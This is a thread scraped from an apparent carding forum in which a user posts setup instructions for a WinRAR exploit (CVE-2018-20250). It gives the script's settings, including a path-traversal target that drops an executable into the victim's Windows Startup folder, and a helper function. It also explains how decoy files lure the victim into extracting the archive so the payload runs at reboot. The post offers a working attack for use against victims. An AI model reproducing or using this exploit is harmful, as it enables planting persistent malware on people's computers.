Carder.life

Carder.life (http://txgate.io:443/index.php)
-   Hacking & Coding (http://txgate.io:443/forumdisplay.php?f=48)
-   -   WINRAR Exploit - CVE-2018-20250 (http://txgate.io:443/showthread.php?t=61165)

Elusive 03-19-2025 10:38 PM

How to setup.
Install python 3.7, and prepare a evil file you want to run, set the values you want, this exp script will generate the evil archive file automatically!
set the values you want
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 162px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;"># The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]</pre>
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 146px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">def get_right_hdr_crc(filename):
# This command may be different, it depends on the your Python3 environment.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)</pre>
run the exp, exp generated the test.rar automatically
https://camo.githubusercontent.com/e...6c3d3530307830
if the victim opens the test.rar, he will see the file hello.txt and world.txt, you can also add more files, more attractive files.
https://camo.githubusercontent.com/8...6c3d3530307830
when he unpacks the file, the victim's user startup directory will have one more file named hi.exe, actually it's a calc.exe. when he restart the computer, the hi.exe will run.
https://camo.githubusercontent.com/2...6c3d3530307830
Needed Files :
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 34px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">https://github.com/WyAtu/CVE-2018-20250/</pre>
https://txgate.io/images/smilies/good.gifhttps://txgate.io/images/smilies/clapping.gifhttps://txgate.io/images/smilies/punish.gif


All times are GMT. The time now is 11:59 AM.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.